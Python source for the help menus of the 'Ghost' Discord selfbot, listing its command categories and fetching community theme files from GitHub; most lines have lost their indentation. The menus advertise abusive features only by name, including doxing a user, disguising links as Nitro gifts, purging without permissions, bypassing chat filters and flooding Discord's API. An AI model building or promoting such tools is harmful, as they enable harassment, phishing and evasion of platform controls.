@Ghost.command(name="help", description="The help command.", usage="help (command)", aliases=["cmds", "commands"])
async def help(ctx, *, command = None):
totalcmds = len(Ghost.commands)-len(scriptsList)
if command is None:
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
Arguments in `[]` are required, arguments in `()` are optional.
`{Ghost.command_prefix}`**text (page 1/2)** » Text commands.
`{Ghost.command_prefix}`**fun (page 1)** » Fun commands.
`{Ghost.command_prefix}`**image (page 1)** » Image commands.
`{Ghost.command_prefix}`**moderation (page 1)** » Moderation commands.
`{Ghost.command_prefix}`**info (page 1)** » Info commands.
`{Ghost.command_prefix}`**user (page 1)** » User commands.
`{Ghost.command_prefix}`**selfbot (page 1)** » Selfbot commands.
`{Ghost.command_prefix}`**webhook (page 1)** » Webhook commands.
`{Ghost.command_prefix}`**abuse (page 1)** » Abuse commands.
`{Ghost.command_prefix}`**themes (page 1)** » Theme commands.
`{Ghost.command_prefix}`**giveaway (page 1)** » Giveaway commands.
`{Ghost.command_prefix}`**nsfw (page 1)** » NSFW commands.
`{Ghost.command_prefix}`**proxy (page 1)** » Proxy commands.
`{Ghost.command_prefix}`**tools (page 1)** » Discord and other tools.
`{Ghost.command_prefix}`**customcommands** » Your custom commands.
`{Ghost.command_prefix}`**customscripts** » Your scripts.
`{Ghost.command_prefix}`**search [term]** » Search for a command.
`{Ghost.command_prefix}`**help (command)** » Help for a specific command.
There is a total of `{totalcmds}` commands.
""")
embed.set_author(name="All Commands")
embed.set_image(url=__embedlargeimage__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {__embedtitle__} ]
Arguments in [] are required, arguments in () are optional.
{Ghost.command_prefix}text (page 1/2) » Text commands.
{Ghost.command_prefix}fun (page 1) » Fun commands.
{Ghost.command_prefix}image (page 1) » Image commands.
{Ghost.command_prefix}moderation (page 1) » Moderation commands.
{Ghost.command_prefix}info (page 1) » Info commands.
{Ghost.command_prefix}user (page 1) » User commands.
{Ghost.command_prefix}selfbot (page 1) » Selfbot commands.
{Ghost.command_prefix}webhook (page 1) » Webhook commands.
{Ghost.command_prefix}abuse (page 1) » Abuse commands.
{Ghost.command_prefix}themes (page 1) » Theme commands.
{Ghost.command_prefix}giveaway (page 1) » Giveaway commands.
{Ghost.command_prefix}nsfw (page 1) » NSFW commands.
{Ghost.command_prefix}proxy (page 1) » Proxy commands.
{Ghost.command_prefix}tools (page 1) » Discord and other tools.
{Ghost.command_prefix}customcommands » Your custom commands.
{Ghost.command_prefix}customscripts » Your scripts.
{Ghost.command_prefix}search [term] » Search for a command.
{Ghost.command_prefix}help (command) » Help for a specific command.
There is a total of {totalcmds} commands.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
for cmd in Ghost.commands:
if command == cmd.name or command in cmd.aliases:
                aliases = ', '.join(cmd.aliases) if cmd.aliases else "No aliases"
if __embedmode__:
embed = discord.Embed(title=f"{cmd.name}", color=__embedcolour__)
embed.add_field(name="Usage", value=f"{cmd.usage}", inline=False)
embed.add_field(name="Description", value=f"{cmd.description}", inline=False)
embed.add_field(name="Aliases", value=', '.join(cmd.aliases))
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {cmd.name} ]
Usage: {cmd.usage}
Description: {cmd.description}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="themes", description="Theme related commands.", usage="themes")
async def themes(ctx):
themes = ""
for theme in os.listdir("themes"):
if theme.endswith(".json"):
theme = theme.replace(".json", "")
themes += f"{theme}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__)
embed.add_field(name="Current Theme", value=f"{__theme__}", inline=False)
embed.add_field(name="Other Themes", value=f"{themes}", inline=False)
embed.add_field(name="Commands", value=f"`{Ghost.command_prefix}`**newtheme [name]** » Create a new theme with the given name.\n`{Ghost.command_prefix}`**deltheme [name]** » Delete the named theme.\n`{Ghost.command_prefix}`**theme [theme]** » Change your current theme.\n`{Ghost.command_prefix}`**ctheme** » Community themes.", inline=False)
embed.set_author(name="Theme Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Theme Commands ]
Current Theme: {__theme__}
[ Other Themes ]
{themes}
[ Commands ]
{Ghost.command_prefix}newtheme [name] » Create a new theme with the given name.
{Ghost.command_prefix}deltheme [name] » Delete the named theme.
{Ghost.command_prefix}theme [theme] » Change your current theme.
{Ghost.command_prefix}cthemes » Community themes.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="ctheme", description="Community themes.", usage="ctheme", aliases=["communitythemes", "cloudthemes", "cthemes"])
async def ctheme(ctx, *, dl = None):
if dl is None:
url = "https://raw.githubusercontent.com/GhostSelfbot/Community-Themes/main/themes.txt"
themes = requests.get(url).text.split("\n")
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Community Themes, run `{Ghost.command_prefix}ctheme (theme name)` to download the theme.\n ", color=__embedcolour__)
embed.add_field(name="Theme List", value='\n'.join(themes))
embed.set_author(name="Community Themes")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Community Themes ]
Community Themes, run {Ghost.command_prefix}ctheme (theme name) to download the theme.
[ Theme List ]
{themes}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
request = requests.get("https://raw.githubusercontent.com/GhostSelfbot/Community-Themes/main/themes.txt")
themes = []
for line in request.text.split("\n"):
themes.append(line.replace("\r", ""))
if dl in themes:
url = f'https://raw.githubusercontent.com/GhostSelfbot/Community-Themes/main/{dl}.json'
            data = requests.get(url, allow_redirects=True)
            with open(f'themes/{dl}.json', 'wb') as themeFile:
                themeFile.write(data.content)
if __embedmode__:
embed = discord.Embed(title="Theme downloaded successfully", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Theme downloaded successfully ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="text", description="Text related commands.", usage="text (page)")
async def text(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**js [message]** » Send all your messages in a JavaScript code block.
`{Ghost.command_prefix}`**lua [message]** » Send all your messages in a Lua code block.
`{Ghost.command_prefix}`**php [message]** » Send all your messages in a PHP code block.
`{Ghost.command_prefix}`**html [message]** » Send all your messages in a HTML code block.
`{Ghost.command_prefix}`**css [message]** » Send all your messages in a CSS code block.
`{Ghost.command_prefix}`**yaml [message]** » Send all your messages in a YAML code block.
`{Ghost.command_prefix}`**json [message]** » Send all your messages in a JSON code block.
`{Ghost.command_prefix}`**cpp [message]** » Send all your messages in a C++ code block.
`{Ghost.command_prefix}`**cs [message]** » Send all your messages in a C# code block.
`{Ghost.command_prefix}`**java [message]** » Send all your messages in a Java code block.
`{Ghost.command_prefix}`**python [message]** » Send all your messages in a Python code block.
`{Ghost.command_prefix}`**secret [message]** » Send all your messages in a secret block.
`{Ghost.command_prefix}`**secretletters [message]** » Put all letters from your message into separate secret blocks.
`{Ghost.command_prefix}`**regional [message]** » Replace all letters with emoji.
`{Ghost.command_prefix}`**bold [message]** » Send all your messages in bold.
`{Ghost.command_prefix}`**italic [message]** » Send all your messages in italics.
""")
embed.set_author(name="Text Commands (1/2)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
elif page == 2:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**rembed (delay) [title]** » Kill Discord's API with a sexy rainbow embedded message.
`{Ghost.command_prefix}`**cembed [title] [description] [colour]** » Create a custom embedded message.
`{Ghost.command_prefix}`**embed [title]** » Create an embedded message.
`{Ghost.command_prefix}`**suggest [suggestion]** » Suggest something.
`{Ghost.command_prefix}`**privatemsg [message]** » Send an encrypted message.
`{Ghost.command_prefix}`**privatemsgdecode [message]** » Decode an encrypted message.
`{Ghost.command_prefix}`**blank** » Send a blank message
`{Ghost.command_prefix}`**length [string]** » Get the length of a string.
`{Ghost.command_prefix}`**chatbypass [text]** » Bypass chat language restrictions.
`{Ghost.command_prefix}`**shrug** » Shrug your arms.
`{Ghost.command_prefix}`**tableflip** » Flip the table.
`{Ghost.command_prefix}`**unflip** » Put the table back.
`{Ghost.command_prefix}`**lmgtfy [search]** » Let me Google that for you.
`{Ghost.command_prefix}`**typing [start/stop]** » Start or stop typing.
`{Ghost.command_prefix}`**aesthetic [text]** » Send your text s p a c e d out.
`{Ghost.command_prefix}`**lowercase [msg]** » Send your message in lowercase.
`{Ghost.command_prefix}`**uppercase [msg]** » Send your message in uppercase.
`{Ghost.command_prefix}`**sentencecase [msg]** » Send your messages in sentence case.
`{Ghost.command_prefix}`**ascii [text]** » Send your message in ascii.
`{Ghost.command_prefix}`**zalgo [text]** » Unleash the zalgo into your message.
`{Ghost.command_prefix}`**leet [text]** » Turn your text into 1337 text.
`{Ghost.command_prefix}`**fakeedited [message]** » "Edit" a message.
`{Ghost.command_prefix}`**brainfuck [text]** » Generate brainfuck code from text.
`{Ghost.command_prefix}`**executebrainfuck [code]** » Execute brainfuck code.
""")
embed.set_author(name="Text Commands (2/2)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
if page == 1:
await ctx.send(f"""```ini
[ Text Commands (1/2) ]
{Ghost.command_prefix}js [message] » Send all your messages in a JavaScript code block.
{Ghost.command_prefix}lua [message] » Send all your messages in a Lua code block.
{Ghost.command_prefix}php [message] » Send all your messages in a PHP code block.
{Ghost.command_prefix}html [message] » Send all your messages in a HTML code block.
{Ghost.command_prefix}css [message] » Send all your messages in a CSS code block.
{Ghost.command_prefix}yaml [message] » Send all your messages in a YAML code block.
{Ghost.command_prefix}json [message] » Send all your messages in a JSON code block.
{Ghost.command_prefix}cpp [message] » Send all your messages in a C++ code block.
{Ghost.command_prefix}cs [message] » Send all your messages in a C# code block.
{Ghost.command_prefix}java [message] » Send all your messages in a Java code block.
{Ghost.command_prefix}python [message] » Send all your messages in a Python code block.
{Ghost.command_prefix}secret [message] » Send all your messages in a secret block.
{Ghost.command_prefix}secretletters [message] » Put all letters from your message into separate secret blocks.
{Ghost.command_prefix}regional [message] » Replace all letters with emoji.
{Ghost.command_prefix}bold [message] » Send all your messages in bold.
{Ghost.command_prefix}italic [message] » Send all your messages in italics.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
elif page == 2:
await ctx.send(f"""```ini
[ Text Commands (2/2) ]
{Ghost.command_prefix}rembed (delay) [title] » Kill Discord's API with a sexy rainbow embedded message.
{Ghost.command_prefix}cembed [title] [description] [colour] » Create a custom embedded message.
{Ghost.command_prefix}embed [title] » Create an embedded message.
{Ghost.command_prefix}suggest [suggestion] » Suggest something.
{Ghost.command_prefix}privatemsg [message] » Send an encrypted message.
{Ghost.command_prefix}privatemsgdecode [message] » Decode an encrypted message.
{Ghost.command_prefix}blank » Send a blank message
{Ghost.command_prefix}length [string] » Get the length of a string.
{Ghost.command_prefix}chatbypass [text] » Bypass chat language restrictions.
{Ghost.command_prefix}shrug » Shrug your arms.
{Ghost.command_prefix}tableflip » Flip the table.
{Ghost.command_prefix}unflip » Put the table back.
{Ghost.command_prefix}lmgtfy [search] » Let me Google that for you.
{Ghost.command_prefix}typing [start/stop] » Start or stop typing.
{Ghost.command_prefix}aesthetic [text] » Send your text s p a c e d out.
{Ghost.command_prefix}lowercase [msg] » Send your message in lowercase.
{Ghost.command_prefix}uppercase [msg] » Send your message in uppercase.
{Ghost.command_prefix}sentencecase [msg] » Send your messages in sentence case.
{Ghost.command_prefix}ascii [text] » Send your message in ascii.
{Ghost.command_prefix}zalgo [text] » Unleash the zalgo into your message.
{Ghost.command_prefix}leet [text] » Turn your text into 1337 text.
{Ghost.command_prefix}fakeedited [message] » "Edit" a message.
{Ghost.command_prefix}brainfuck [text] » Generate brainfuck code from text.
{Ghost.command_prefix}executebrainfuck [code] » Execute brainfuck code.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="fun", description="Fun related commands.", usage="fun")
async def fun(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**slots** » Play the slot machine.
`{Ghost.command_prefix}`**yomomma** » Random yo momma joke.
`{Ghost.command_prefix}`**socialcredit [@user]** » A user's social credit score.
`{Ghost.command_prefix}`**roast [@user]** » Roast a user.
`{Ghost.command_prefix}`**howgay [@user]** » How gay a user is.
`{Ghost.command_prefix}`**howskid [@user]** » Check the percentage of a skid.
`{Ghost.command_prefix}`**halal [@user]** » Checks if a user is halal or haram.
`{Ghost.command_prefix}`**iq [@user]** » Check how smart a user is.
`{Ghost.command_prefix}`**pp [@user]** » The length of a user's penis.
`{Ghost.command_prefix}`**rainbowrole [@role]** » Kill Discord's API with a sexy rainbow role.
`{Ghost.command_prefix}`**coinflip** » Flip a coin.
`{Ghost.command_prefix}`**dice** » Roll a dice.
`{Ghost.command_prefix}`**8ball [question]** » Ask the magic eight ball a question.
`{Ghost.command_prefix}`**choice [choice1] [choice2]** » Pick a random choice.
`{Ghost.command_prefix}`**range [number1] [number2]** » Choose a random number between two.
`{Ghost.command_prefix}`**dox [@user]** » Dox the mentioned user.
`{Ghost.command_prefix}`**fakenitro [url]** » Hide a link in a nitro URL.
`{Ghost.command_prefix}`**purgehack** » Purge without permissions.
`{Ghost.command_prefix}`**dadjoke** » A random dad joke.
`{Ghost.command_prefix}`**randommessage** » A random message.
`{Ghost.command_prefix}`**randomquestion** » A random question.
`{Ghost.command_prefix}`**rickroll** » Send never gonna give you up lyrics one by one.
`{Ghost.command_prefix}`**stoprickroll** » Stop sending rick astley lyrics.
`{Ghost.command_prefix}`**countdown [number]** » Count down from a number.
`{Ghost.command_prefix}`**countup [number]** » Count up from a number.
`{Ghost.command_prefix}`**pytoexe [path]** » Convert a PY file to an executable.
`{Ghost.command_prefix}`**skin [name]** » Gets the skin of a MC user.
""")
embed.set_author(name="Fun Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Fun Commands ]
{Ghost.command_prefix}slots » Play the slot machine.
{Ghost.command_prefix}yomomma » Random yo momma joke.
{Ghost.command_prefix}socialcredit [@user] » A user's social credit score.
{Ghost.command_prefix}roast [@user] » Roast a user.
{Ghost.command_prefix}howgay [@user] » How gay a user is.
{Ghost.command_prefix}howskid [@user] » Check the percentage of a skid.
{Ghost.command_prefix}halal [@user] » Checks if a user is halal or haram.
{Ghost.command_prefix}iq [@user] » Check how smart a user is.
{Ghost.command_prefix}pp [@user] » The length of a user's penis.
{Ghost.command_prefix}rainbowrole [@role] » Kill Discord's API with a sexy rainbow role.
{Ghost.command_prefix}coinflip » Flip a coin.
{Ghost.command_prefix}dice » Roll a dice.
{Ghost.command_prefix}8ball [question] » Ask the magic eight ball a question.
{Ghost.command_prefix}choice [choice1] [choice2] » Pick a random choice.
{Ghost.command_prefix}range [number1] [number2] » Choose a random number between two.
{Ghost.command_prefix}dox [@user] » Dox the mentioned user.
{Ghost.command_prefix}fakenitro [url] » Hide a link in a nitro URL.
{Ghost.command_prefix}purgehack » Purge without permissions.
{Ghost.command_prefix}dadjoke » A random dad joke.
{Ghost.command_prefix}randommessage » A random message.
{Ghost.command_prefix}randomquestion » A random question.
{Ghost.command_prefix}rickroll » Send never gonna give you up lyrics one by one.
{Ghost.command_prefix}stoprickroll » Stop sending rick astley lyrics.
{Ghost.command_prefix}countdown [number] » Count down from a number.
{Ghost.command_prefix}countup [number] » Count up from a number.
{Ghost.command_prefix}pytoexe [path] » Convert a PY file to an executable.
{Ghost.command_prefix}skin [name] » Gets the skin of a MC user.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="image", description="Image related commands.", usage="image", aliases=["img"])
async def image(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**meme** » A random meme.
`{Ghost.command_prefix}`**cat** » A random cat image.
`{Ghost.command_prefix}`**dog** » A random dog image.
`{Ghost.command_prefix}`**shiba** » A random shiba image.
`{Ghost.command_prefix}`**fox** » A random fox image. (Thanks Imf44 <3)
`{Ghost.command_prefix}`**avatar [@user]** » Get the mentioned user's avatar.
`{Ghost.command_prefix}`**servericon** » Get the server's icon.
`{Ghost.command_prefix}`**achievement ["text"] (icon)** » Create a fake minecraft achievement image.
`{Ghost.command_prefix}`**challenge ["text"] (icon)** » Create a fake minecraft challenge image.
`{Ghost.command_prefix}`**captcha [text]** » Create a fake reCaptcha.
`{Ghost.command_prefix}`**amiajoke [@user]** » Make a user a joke.
`{Ghost.command_prefix}`**didyoumean ["text 1"] ["text 2"]** » Create a google did you mean image.
`{Ghost.command_prefix}`**drake ["text 1"] ["text 2"]** » Create a drake meme image.
`{Ghost.command_prefix}`**facts [text]** » Create a facts meme image.
`{Ghost.command_prefix}`**jokeoverhead [image url]** » Create a joke over head image.
`{Ghost.command_prefix}`**pornhub ["text 1"] ["text 2"]** » Create a pornhub logo image.
`{Ghost.command_prefix}`**salty [@user]** » Make someone salty.
`{Ghost.command_prefix}`**ship [@user 1] [@user 2]** » Ship two people.
`{Ghost.command_prefix}`**trash [@user]** » Put someone in the trash.
`{Ghost.command_prefix}`**what [image url]** » Make a what meme.
""")
embed.set_author(name="Image Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Image Commands ]
{Ghost.command_prefix}meme » A random meme.
{Ghost.command_prefix}cat » A random cat image.
{Ghost.command_prefix}dog » A random dog image.
{Ghost.command_prefix}shiba » A random shiba image.
{Ghost.command_prefix}fox » A random fox image. (Thanks Imf44 <3)
{Ghost.command_prefix}avatar [@user] » Get the mentioned user's avatar.
{Ghost.command_prefix}servericon » Get the server's icon.
{Ghost.command_prefix}achievement ["text"] (icon) » Create a fake minecraft achievement image.
{Ghost.command_prefix}challenge ["text"] (icon) » Create a fake minecraft challenge image.
{Ghost.command_prefix}captcha [text] » Create a fake reCaptcha.
{Ghost.command_prefix}amiajoke [@user] » Make a user a joke.
{Ghost.command_prefix}didyoumean ["text 1"] ["text 2"] » Create a google did you mean image.
{Ghost.command_prefix}drake ["text 1"] ["text 2"] » Create a drake meme image.
{Ghost.command_prefix}facts [text] » Create a facts meme image.
{Ghost.command_prefix}jokeoverhead [image url] » Create a joke over head image.
{Ghost.command_prefix}pornhub ["text 1"] ["text 2"] » Create a pornhub logo image.
{Ghost.command_prefix}salty [@user] » Make someone salty.
{Ghost.command_prefix}ship [@user 1] [@user 2] » Ship two people.
{Ghost.command_prefix}trash [@user] » Put someone in the trash.
{Ghost.command_prefix}what [image url] » Make a what meme.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="nsfw", description="NSFW related commands.", usage="nsfw")
async def nsfw(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**boobs** » Pictures or videos of boobs.
`{Ghost.command_prefix}`**ass** » Pictures or videos of ass.
`{Ghost.command_prefix}`**pussy** » Pictures or videos of pussy.
`{Ghost.command_prefix}`**porngif** » Porn gifs.
`{Ghost.command_prefix}`**hentai** » Pictures or videos of hentai.
""")
embed.set_author(name="NSFW Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ NSFW Commands ]
{Ghost.command_prefix}boobs » Pictures or videos of boobs.
{Ghost.command_prefix}ass » Pictures or videos of ass.
{Ghost.command_prefix}pussy » Pictures or videos of pussy.
{Ghost.command_prefix}porngif » Porn gifs.
{Ghost.command_prefix}hentai » Pictures or videos of hentai.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="moderation", description="Moderation related commands.", usage="moderation")
async def moderation(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**ban [@user]** » Ban the mentioned user.
`{Ghost.command_prefix}`**unban [id]** » Unban the mentioned id.
`{Ghost.command_prefix}`**banlist** » See the server's ban list.
`{Ghost.command_prefix}`**kick [@user]** » Kick the mentioned user.
`{Ghost.command_prefix}`**mute [@user]** » Mute the mentioned user.
`{Ghost.command_prefix}`**unmute [@user]** » Unmute the mentioned user.
`{Ghost.command_prefix}`**newrole [name]** » Create a new role.
`{Ghost.command_prefix}`**delrole [@role]** » Delete the mentioned role.
`{Ghost.command_prefix}`**purge [amount]** » Purge X amount of messages.
`{Ghost.command_prefix}`**lock** » Lock the command channel.
`{Ghost.command_prefix}`**unlock** » Unlock the command channel.
`{Ghost.command_prefix}`**lockdown** » Lock the entire server.
`{Ghost.command_prefix}`**unlockdown** » Unlock the entire server.
`{Ghost.command_prefix}`**spacechannel [channel name]** » Create a channel with spaces.
""")
embed.set_author(name="Moderation Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Moderation Commands ]
{Ghost.command_prefix}ban [@user] » Ban the mentioned user.
{Ghost.command_prefix}unban [id] » Unban the mentioned id.
{Ghost.command_prefix}banlist » See the server's ban list.
{Ghost.command_prefix}kick [@user] » Kick the mentioned user.
{Ghost.command_prefix}mute [@user] » Mute the mentioned user.
{Ghost.command_prefix}unmute [@user] » Unmute the mentioned user.
{Ghost.command_prefix}newrole [name] » Create a new role.
{Ghost.command_prefix}delrole [@role] » Delete the mentioned role.
{Ghost.command_prefix}purge [amount] » Purge X amount of messages.
{Ghost.command_prefix}lock » Lock the command channel.
{Ghost.command_prefix}unlock » Unlock the command channel.
{Ghost.command_prefix}lockdown » Lock the entire server.
{Ghost.command_prefix}unlockdown » Unlock the entire server.
{Ghost.command_prefix}spacechannel [channel name] » Create a channel with spaces.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="info", description="Info related commands.", usage="info")
async def info(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**userinfo [@user]** » Information about the mentioned user.
`{Ghost.command_prefix}`**serverinfo** » Information about the command server.
`{Ghost.command_prefix}`**watchdogstats** » Get stats about Hypixel's Anticheat, Watchdog.
`{Ghost.command_prefix}`**getmessage [message id]** » Get a message by ID.
`{Ghost.command_prefix}`**geoip [ip]** » Get information from an IP address.
`{Ghost.command_prefix}`**ping [ip/domain]** » Ping a domain or ip address.
`{Ghost.command_prefix}`**crypto [currency]** » Get the current data on a cryptocurrency.
""")
embed.set_author(name="Info Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Info Commands ]
{Ghost.command_prefix}userinfo [@user] » Information about the mentioned user.
{Ghost.command_prefix}serverinfo » Information about the command server.
{Ghost.command_prefix}watchdogstats » Get stats about Hypixel's Anticheat, Watchdog.
{Ghost.command_prefix}getmessage [message id] » Get a message by ID.
{Ghost.command_prefix}geoip [ip] » Get information from an IP address.
{Ghost.command_prefix}ping [ip/domain] » Ping a domain or ip address.
{Ghost.command_prefix}crypto [currency] » Get the current data on a cryptocurrency.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="user", description="User related commands.", usage="user")
async def user(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**purgeself [amount]** » Purge your messages.
`{Ghost.command_prefix}`**statuscycle** » Start a custom status cycle.
`{Ghost.command_prefix}`**statuscycletext [text]** » Set the text used in status cycle.
`{Ghost.command_prefix}`**clearstatus** » Clear your status.
`{Ghost.command_prefix}`**nickname [text]** » Set your nickname to anything.
`{Ghost.command_prefix}`**clearnickname** » Clear your nickname.
`{Ghost.command_prefix}`**ppin [message id]** » Add a message to your personal pins.
`{Ghost.command_prefix}`**ppins** » List all your pinned messages.
`{Ghost.command_prefix}`**ppindel [pin id]** » Delete a pin from your personal pins.
`{Ghost.command_prefix}`**backupfriends** » Backup all your friend's user IDs to a file.
`{Ghost.command_prefix}`**backupservers** » Backup all your servers and try to create invites for each one.
`{Ghost.command_prefix}`**changehypesquad [bravery/brilliance/balance]** » Change your hypesquad house.
""")
embed.set_author(name="User Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ User Commands ]
{Ghost.command_prefix}purgeself [amount] » Purge your messages.
{Ghost.command_prefix}statuscycle » Start a custom status cycle.
{Ghost.command_prefix}statuscycletext [text] » Set the text used in status cycle.
{Ghost.command_prefix}clearstatus » Clear your status.
{Ghost.command_prefix}nickname [text] » Set your nickname to anything.
{Ghost.command_prefix}clearnickname » Clear your nickname.
{Ghost.command_prefix}ppin [message id] » Add a message to your personal pins.
{Ghost.command_prefix}ppins » List all your pinned messages.
{Ghost.command_prefix}ppindel [pin id] » Delete a pin from your personal pins.
{Ghost.command_prefix}backupfriends » Backup all your friend's user IDs to a file.
{Ghost.command_prefix}backupservers » Backup all your servers and try to create invites for each one.
{Ghost.command_prefix}changehypesquad [bravery/brilliance/balance] » Change your hypesquad house.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="selfbot", description="Selfbot related commands.", usage="selfbot")
async def selfbot(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**afkmode** » Toggle afk mode.
`{Ghost.command_prefix}`**settings** » The bot's settings.
`{Ghost.command_prefix}`**restart** » Restart Ghost selfbot.
`{Ghost.command_prefix}`**prefix [prefix]** » Set the command prefix.
`{Ghost.command_prefix}`**dumpchat [amount] (channel id) (oldest first, true/false)** » Get the chat's history.
`{Ghost.command_prefix}`**invite** » Get Ghost's Discord server invite link.
`{Ghost.command_prefix}`**addccmd [name] [response]** » Add a custom command.
`{Ghost.command_prefix}`**delccmd [name]** » Delete a custom command.
`{Ghost.command_prefix}`**detections** » A list of all detections.
`{Ghost.command_prefix}`**snipers** » A list of all snipers.
`{Ghost.command_prefix}`**enablesniper [type]** » Enable a sniper.
`{Ghost.command_prefix}`**disablesniper [type]** » Disable a sniper.
`{Ghost.command_prefix}`**enabledetect [type]** » Enable a detection.
`{Ghost.command_prefix}`**disabledetect [type]** » Disable a detection.
`{Ghost.command_prefix}`**riskmode** » Disable and enable risk mode.
`{Ghost.command_prefix}`**sounds** » Toggle Ghost notification sounds.
`{Ghost.command_prefix}`**notifications** » Toggle Ghost notifications.
